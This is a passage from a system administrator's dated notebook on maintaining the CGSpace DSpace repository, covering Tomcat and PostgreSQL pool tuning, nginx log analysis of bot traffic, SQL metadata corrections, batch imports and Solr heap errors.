2&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
+
    +
  • The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error
  • +
  • This is apparently a common Solr error code that means “version conflict”: http://yonik.com/solr/optimistic-concurrency/
  • +
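  • A quick way to check from the command line whether a given yearly core already exists is the same cores STATUS action that shows up in the access log above (a sketch; assumes Solr on port 8081):
$ http 'http://localhost:8081/solr/admin/cores?action=STATUS&core=statistics-2016&wt=json'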
  • Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+  21572 70.36.107.50
+  30722 70.36.107.190
+  34566 70.36.107.49
+ 101829 2607:fa98:40:9:26b6:fdff:feff:195d
+ 111535 2607:fa98:40:9:26b6:fdff:feff:1c96
+ 161797 2607:fa98:40:9:26b6:fdff:feff:1888
+
    +
  • Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat’s server.xml:
  • +
+
<Resource name="jdbc/dspaceWeb" auth="Container" type="javax.sql.DataSource"
+          driverClassName="org.postgresql.Driver"
+          url="jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb"
+          username="dspace"
+          password="dspace"
+          initialSize='5'
+          maxActive='75'
+          maxIdle='15'
+          minIdle='5'
+          maxWait='5000'
+          validationQuery='SELECT 1'
+          testOnBorrow='true' />
+
    +
  • So theoretically I could name each connection “xmlui” or “dspaceWeb” or something meaningful and it would show up in PostgreSQL’s pg_stat_activity table!
  • +
  • This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)
  • +
  • Also, I realized that the db.jndi parameter in dspace.cfg needs to match the name value in your application’s context—not the global one
  • +
  • Ah hah! Also, I can name the default DSpace connection pool in dspace.cfg as well, like:
  • +
+
db.url = jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceDefault
+
    +
  • With that it is super easy to see where PostgreSQL connections are coming from in pg_stat_activity
  • +
+
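  • For example, something like this should show how many connections each named pool is holding (a sketch; assumes psql can connect to the dspacetest database used in the JNDI URL above):
$ psql -d dspacetest -c 'SELECT application_name, state, count(*) FROM pg_stat_activity GROUP BY 1, 2 ORDER BY 3 DESC;'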

2018-01-12

+
    +
  • I’m looking at the DSpace 6.0 Install docs and notice they tweak the number of threads in their Tomcat connector:
  • +
+
<!-- Define a non-SSL HTTP/1.1 Connector on port 8080 -->
+<Connector port="8080"
+           maxThreads="150"
+           minSpareThreads="25"
+           maxSpareThreads="75"
+           enableLookups="false"
+           redirectPort="8443"
+           acceptCount="100"
+           connectionTimeout="20000"
+           disableUploadTimeout="true"
+           URIEncoding="UTF-8"/>
+
    +
  • In Tomcat 8.5 the maxThreads defaults to 200 which is probably fine, but tweaking minSpareThreads could be good
  • +
  • I don’t see a setting for maxSpareThreads in the docs so that might be an error
  • +
  • Looks like in Tomcat 8.5 the default URIEncoding for Connectors is UTF-8, so we don’t need to specify that manually anymore: https://tomcat.apache.org/tomcat-8.5-doc/config/http.html
  • +
  • Ooh, I just saw the acceptorThreadCount setting (in Tomcat 7 and 8.5):
  • +
+
The number of threads to be used to accept connections. Increase this value on a multi CPU machine, although you would never really need more than 2. Also, with a lot of non keep alive connections, you might want to increase this value as well. Default value is 1.
+
    +
  • That could be very interesting
  • +
+

2018-01-13

+
    +
  • Still testing DSpace 6.2 on Tomcat 8.5.24
  • +
  • Catalina errors at Tomcat 8.5 startup:
  • +
+
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of "35" for "maxActive" property, which is being ignored.
+13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of "5000" for "maxWait" property, which is being ignored.
+
    +
  • I looked in my Tomcat 7.0.82 logs and I don’t see anything about DBCP2 errors, so I guess this is a Tomcat 8.0.x or 8.5.x thing
  • +
  • DBCP2 appears to be the default in Tomcat 8.0.x and up, according to the Tomcat 8.0 migration guide
  • +
  • I have updated our Ansible infrastructure scripts so that it will be ready whenever we switch to Tomcat 8 (probably with Ubuntu 18.04 later this year)
  • +
  • When I enable the ResourceLink in the ROOT.xml context I get the following error in the Tomcat localhost log:
  • +
+
13-Jan-2018 14:14:36.017 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.app.util.DSpaceWebappListener]
+ java.lang.ExceptionInInitializerError
+        at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:74)
+        at org.dspace.app.util.DSpaceWebappListener.contextInitialized(DSpaceWebappListener.java:31)
+        at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4745)
+        at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5207)
+        at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:150)
+        at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:752)
+        at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:728)
+        at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:734)
+        at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:629)
+        at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:1839)
+        at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at java.lang.Thread.run(Thread.java:748)
+Caused by: java.lang.NullPointerException
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:547)
+        at org.dspace.core.Context.<clinit>(Context.java:103)
+        ... 15 more
+
    +
  • Interesting blog post benchmarking Tomcat JDBC vs Apache Commons DBCP2, with configuration snippets: http://www.tugay.biz/2016/07/tomcat-connection-pool-vs-apache.html
  • +
  • The Tomcat vs Apache pool thing is confusing, but apparently we’re using Apache Commons DBCP2 because we don’t specify factory="org.apache.tomcat.jdbc.pool.DataSourceFactory" in our global resource
  • +
  • So at least I know that I’m not looking for documentation or troubleshooting on the Tomcat JDBC pool!
  • +
  • I looked at pg_stat_activity during Tomcat’s startup and I see that the pool created in server.xml is indeed connecting, just that nothing uses it
  • +
  • Also, the fallback connection parameters specified in local.cfg (not dspace.cfg) are used
  • +
  • Shit, this might actually be a DSpace error: https://jira.duraspace.org/browse/DS-3434
  • +
  • I’ll comment on that issue
  • +
+

2018-01-14

+
    +
  • Looking at the authors Peter had corrected
  • +
  • Some had multiple values and he’s corrected them by adding || in the correction column, but I can’t process those this way, so I will just have to flag them and do those manually later
  • +
  • Also, I can flag the values that have “DELETE”
  • +
  • Then I need to facet the correction column on isBlank(value) and not flagged
  • +
+

2018-01-15

+
    +
  • Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload
  • +
  • I’m going to apply these ~130 corrections on CGSpace:
  • +
+
update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
+update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
+update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
+update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
+update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
+update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
+update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
+
    +
  • Continue proofing Peter’s author corrections that I started yesterday, faceting on non-blank, non-flagged, and briefly scrolling through the values of the corrections to find encoding errors in French and Spanish names
  • +
+

OpenRefine Authors

+ +
$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
+
    +
  • While looking at some of the values to delete or check, I found some metadata values whose handles I could not resolve via SQL:
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
+ metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
+-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
+           2757936 |        4369 |                 3 | Tarawali   |           |     9 |           |        600 |                2
+(1 row)
+
+dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '4369';
+ handle
+--------
+(0 rows)
+
    +
  • Even searching in the DSpace advanced search for author equals “Tarawali” produces nothing…
  • +
  • Otherwise, the DSpace 5 SQL Helper Functions provide ds5_item2itemhandle(), which is much easier than my long query above that I always have to go search for
  • +
  • For example, to find the Handle for an item that has the author “Erni”:
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
+ metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place |              authority               | confidence | resource_type_id 
+-------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
+           2612150 |       70308 |                 3 | Erni       |           |     9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 |         -1 |                2
+(1 row)
+dspace=# select ds5_item2itemhandle(70308);
+ ds5_item2itemhandle 
+---------------------
+ 10568/68609
+(1 row)
+
    +
  • Next I apply the author deletions:
  • +
+
$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
+
    +
  • Now working on the affiliation corrections from Peter:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
+$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
+
    +
  • Now I made a new list of affiliations for Peter to look through:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+COPY 4552
+
    +
  • Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)
  • +
  • For example, this one is from just last month: https://cgspace.cgiar.org/handle/10568/89930
  • +
  • Our controlled vocabulary has this in the format without the abbreviation: International Center for Tropical Agriculture
  • +
  • So some submitters don’t know to use the controlled vocabulary lookup
  • +
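  • A rough way to see how many affiliation values use the parenthesized abbreviation format (a sketch; 211 is the cg.contributor.affiliation field ID used in the corrections above, and the database is assumed to be named dspace):
$ psql -d dspace -c "SELECT count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=211 AND text_value LIKE '%(CIAT)%';"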
  • Help Sisay with some thumbnails for book chapters in OpenRefine and SAFBuilder
  • +
  • CGSpace users were having problems logging in; I think something’s wrong with LDAP because I see this in the logs:
  • +
+
2018-01-15 12:53:15,810 WARN  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2386749547D03E0AA4EC7E44181A7552:ip_addr=x.x.x.x:ldap_authentication:type=failed_auth javax.naming.AuthenticationException\colon; [LDAP\colon; error code 49 - 80090308\colon; LdapErr\colon; DSID-0C090400, comment\colon; AcceptSecurityContext error, data 775, v1db1^@]
+
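  • If I remember correctly, data 775 in that Active Directory error usually means the account is locked out, so it might be worth testing the bind outside of DSpace with ldapsearch (a sketch; the server URI, bind DN, search base, and account below are placeholders, not our real values):
$ ldapsearch -x -H 'ldaps://ldap.example.org' -D 'binduser@example.org' -W -b 'dc=example,dc=org' '(sAMAccountName=someuser)'   # all values are placeholders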
    +
  • Looks like we processed 2.9 million requests on CGSpace in 2017-12:
  • +
+
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Dec/2017"
+2890041
+
+real    0m25.756s
+user    0m28.016s
+sys     0m2.210s
+

2018-01-16

+
    +
  • Meeting with CGSpace team, a few action items: +
      +
    • Discuss standardized names for CRPs and centers with ICARDA (don’t wait for CG Core)
    • +
    • Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)
    • +
    • Start looking at where I was with the AGROVOC API
    • +
    • Have a controlled vocabulary for CGIAR authors’ names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)
    • +
    • Need to find the metadata field name that ICARDA is using for their ORCIDs
    • +
    • Update text for DSpace version plan on wiki
    • +
    • Come up with an SLA, something like: In return for your contribution we will, to the best of our ability, ensure 99.5% (“two and a half nines”) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, …
    • +
    • Add Sisay and Danny to Uptime Robot and allow them to restart Tomcat on CGSpace ✔
    • +
    +
  • +
  • I removed Tsega’s SSH access to the web and DSpace servers, and asked Danny to check whether there is anything he needs from Tsega’s home directories so we can delete the accounts completely
  • +
  • I removed Tsega’s access to Linode dashboard as well
  • +
  • I ended up creating a Jira issue for my db.jndi documentation fix: DS-3803
  • +
  • The DSpace developers said they wanted each pull request to be associated with a Jira issue
  • +
+

2018-01-17

+
    +
  • Abenet asked me to proof and upload 54 records for LIVES
  • +
  • A few records were missing countries (even though they’re all from Ethiopia)
  • +
  • Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses
  • +
  • In any case, importing them like this:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
+$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &> lives.log
+
    +
  • And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload
  • +
  • When I looked there were 210 PostgreSQL connections!
  • +
  • I don’t see any high load in XMLUI or REST/OAI:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    381 40.77.167.124
+    403 213.55.99.121
+    431 207.46.13.60
+    445 157.55.39.113
+    445 157.55.39.231
+    449 95.108.181.88
+    453 68.180.229.254
+    593 54.91.48.104
+    757 104.196.152.243
+    776 66.249.66.90
+# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+     11 205.201.132.14
+     11 40.77.167.124
+     15 35.226.23.240
+     16 157.55.39.231
+     16 66.249.64.155
+     18 66.249.66.90
+     22 95.108.181.88
+     58 104.196.152.243
+   4106 70.32.83.92
+   9229 45.5.184.196
+
    +
  • But I do see this strange message in the dspace log:
  • +
+
2018-01-17 07:59:25,856 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (org.apache.http.NoHttpResponseException) caught when processing request to {}->http://localhost:8081: The target server failed to respond
+2018-01-17 07:59:25,856 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}->http://localhost:8081
+
    +
  • I have NEVER seen this error before, and there is no error before or after that in DSpace’s solr.log
  • +
  • Tomcat’s catalina.out does show something interesting, though, right at that time:
  • +
+
[====================>                              ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:02
+[====================>                              ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
+[====================>                              ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
+[====================>                              ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
+Exception in thread "http-bio-127.0.0.1-8081-exec-627" java.lang.OutOfMemoryError: Java heap space
+        at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
+        at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
+        at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
+        at org.apache.solr.search.SolrIndexSearcher.getDocListNC(SolrIndexSearcher.java:1557)
+        at org.apache.solr.search.SolrIndexSearcher.getDocListC(SolrIndexSearcher.java:1433)
+        at org.apache.solr.search.SolrIndexSearcher.search(SolrIndexSearcher.java:514)
+        at org.apache.solr.handler.component.QueryComponent.process(QueryComponent.java:485)
+        at org.apache.solr.handler.component.SearchHandler.handleRequestBody(SearchHandler.java:218)
+        at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:135)
+        at org.apache.solr.core.SolrCore.execute(SolrCore.java:1967)
+        at org.apache.solr.servlet.SolrDispatchFilter.execute(SolrDispatchFilter.java:777)
+        at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:418)
+        at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:207)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.solr.filters.LocalHostRestrictionFilter.doFilter(LocalHostRestrictionFilter.java:50)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+        at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:318) 
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+
  • You can see the timestamp above, which is some Atmire nightly task I think, but I can’t figure out which one
  • So I restarted Tomcat and tried the import again, which finished very quickly and without errors!

$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives2.map &> lives2.log
+
  • Looking at the JVM graphs from Munin it does look like the heap ran out of memory (see the blue dip just before the green spike when I restarted Tomcat):


Tomcat JVM Heap

  • In other news, I’m playing with running Artifactory in Docker as a local Maven repository cache:

$ docker pull docker.bintray.io/jfrog/artifactory-oss:latest
+$ docker volume create --name artifactory5_data
+$ docker network create dspace-build
+$ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss:latest
+
  • Then configure the local maven to use it in settings.xml with the settings from “Set Me Up”: https://www.jfrog.com/confluence/display/RTF/Using+Artifactory
  • This could be a game changer for testing and running the Docker DSpace image
  • Wow, I even managed to add the Atmire repository as a remote and map it into the libs-release virtual repository, then tell maven to use it for atmire.com-releases in settings.xml!
  • Hmm, some maven dependencies for the SWORDv2 web application in DSpace 5.5 are broken:

[ERROR] Failed to execute goal on project dspace-swordv2: Could not resolve dependencies for project org.dspace:dspace-swordv2:war:5.5: Failed to collect dependencies at org.swordapp:sword2-server:jar:classes:1.0 -> org.apache.abdera:abdera-client:jar:1.1.1 -> org.apache.abdera:abdera-core:jar:1.1.1 -> org.apache.abdera:abdera-i18n:jar:1.1.1 -> org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Failed to read artifact descriptor for org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Could not find artifact org.apache.geronimo.specs:specs:pom:1.1 in central (http://localhost:8081/artifactory/libs-release) -> [Help 1]
+
  • I never noticed because I build with that web application disabled:

$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=localhost -P \!dspace-sword,\!dspace-swordv2 clean package
+
  • UptimeRobot said CGSpace went down for a few minutes
  • I didn’t do anything but it came back up on its own
  • I don’t see anything unusual in the XMLUI or REST/OAI logs
  • Now a Linode alert says the CPU load is high, sigh
  • Regarding the heap space error earlier today, it looks like it does happen a few times a week or month (I’m not sure how far these logs go back, as they are not strictly daily):

# zgrep -c java.lang.OutOfMemoryError /var/log/tomcat7/catalina.out* | grep -v :0
+/var/log/tomcat7/catalina.out:2
+/var/log/tomcat7/catalina.out.10.gz:7
+/var/log/tomcat7/catalina.out.11.gz:1
+/var/log/tomcat7/catalina.out.12.gz:2
+/var/log/tomcat7/catalina.out.15.gz:1
+/var/log/tomcat7/catalina.out.17.gz:2
+/var/log/tomcat7/catalina.out.18.gz:3
+/var/log/tomcat7/catalina.out.20.gz:1
+/var/log/tomcat7/catalina.out.21.gz:4
+/var/log/tomcat7/catalina.out.25.gz:1
+/var/log/tomcat7/catalina.out.28.gz:1
+/var/log/tomcat7/catalina.out.2.gz:6
+/var/log/tomcat7/catalina.out.30.gz:2
+/var/log/tomcat7/catalina.out.31.gz:1
+/var/log/tomcat7/catalina.out.34.gz:1
+/var/log/tomcat7/catalina.out.38.gz:1
+/var/log/tomcat7/catalina.out.39.gz:1
+/var/log/tomcat7/catalina.out.4.gz:3
+/var/log/tomcat7/catalina.out.6.gz:2
+/var/log/tomcat7/catalina.out.7.gz:14
+
  • Overall the heap space usage in the munin graph seems ok, though I usually increase it by 512MB over the average a few times per year as usage grows
  • But maybe I should increase it by more, like 1024MB, to give a bit more headroom


2018-01-18

  • UptimeRobot said CGSpace was down for 1 minute last night
  • I don’t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499
  • I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:

$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
+
  • Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the Bioversity Journal Articles collection
  • It’s easy enough to do in OpenRefine, but you have to be careful to only get those items that are uploaded into Bioversity’s collection, not the ones that are mapped from others!
  • Use this GREL in OpenRefine after isolating all the Limited Access items: value.startsWith("10568/35501")
  • UptimeRobot said CGSpace went down AGAIN and both Sisay and Danny immediately logged in and restarted Tomcat without talking to me or each other!

Jan 18 07:01:22 linode18 sudo[10805]: dhmichael : TTY=pts/5 ; PWD=/home/dhmichael ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
+Jan 18 07:01:22 linode18 sudo[10805]: pam_unix(sudo:session): session opened for user root by dhmichael(uid=0)
+Jan 18 07:01:22 linode18 systemd[1]: Stopping LSB: Start Tomcat....
+Jan 18 07:01:22 linode18 sudo[10812]: swebshet : TTY=pts/3 ; PWD=/home/swebshet ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
+Jan 18 07:01:22 linode18 sudo[10812]: pam_unix(sudo:session): session opened for user root by swebshet(uid=0)
+
  • I had to cancel the Discovery indexing and I’ll have to re-try it another time when the server isn’t so busy (it had already taken two hours and wasn’t even close to being done)
  • For now I’ve increased the Tomcat JVM heap from 5632 to 6144m, to give ~1GB of free memory over the average usage to hopefully account for spikes caused by load or background jobs

2018-01-19

  • Linode alerted and said that the CPU load was 264.1% on CGSpace
  • Start the Discovery indexing again:

$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
+
  • Linode alerted again and said that CGSpace was using 301% CPU
  • Peter emailed to ask why this item doesn’t have an Altmetric badge on CGSpace but does have one on the Altmetric dashboard
  • Looks like our badge code calls the handle endpoint which doesn’t exist:

https://api.altmetric.com/v1/handle/10568/88090
+
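
Out of curiosity, here is a rough way to compare what the Altmetric API returns for the item’s Handle versus its DOI. This is only an illustrative sketch, not the actual badge code: the DOI below is a placeholder, and I’m assuming the v1 API answers 404 when it has no record for an identifier.

#!/usr/bin/env python3
# Compare Altmetric API v1 responses for an item's Handle and DOI.
# The Handle is the one from above; the DOI is a placeholder to fill in.
import requests

identifiers = {
    "handle": "10568/88090",
    "doi": "10.0000/PLACEHOLDER",  # replace with the item's real DOI
}

for kind, value in identifiers.items():
    url = f"https://api.altmetric.com/v1/{kind}/{value}"
    r = requests.get(url, timeout=30)
    if r.ok:
        print(f"{url}: Altmetric score {r.json().get('score')}")
    else:
        # a 404 here presumably means Altmetric has no record for this identifier
        print(f"{url}: HTTP {r.status_code}")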
  • I told Peter we should keep an eye out and try again next week

2018-01-20

  • Run the authority indexing script on CGSpace and of course it died:

$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-authority 
+Retrieving all data 
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer 
+Exception: null
+java.lang.NullPointerException
+        at org.dspace.authority.AuthorityValueGenerator.generateRaw(AuthorityValueGenerator.java:82)
+        at org.dspace.authority.AuthorityValueGenerator.generate(AuthorityValueGenerator.java:39)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.prepareNextValue(DSpaceAuthorityIndexer.java:201)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:132)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:159)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.AuthorityIndexClient.main(AuthorityIndexClient.java:61)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
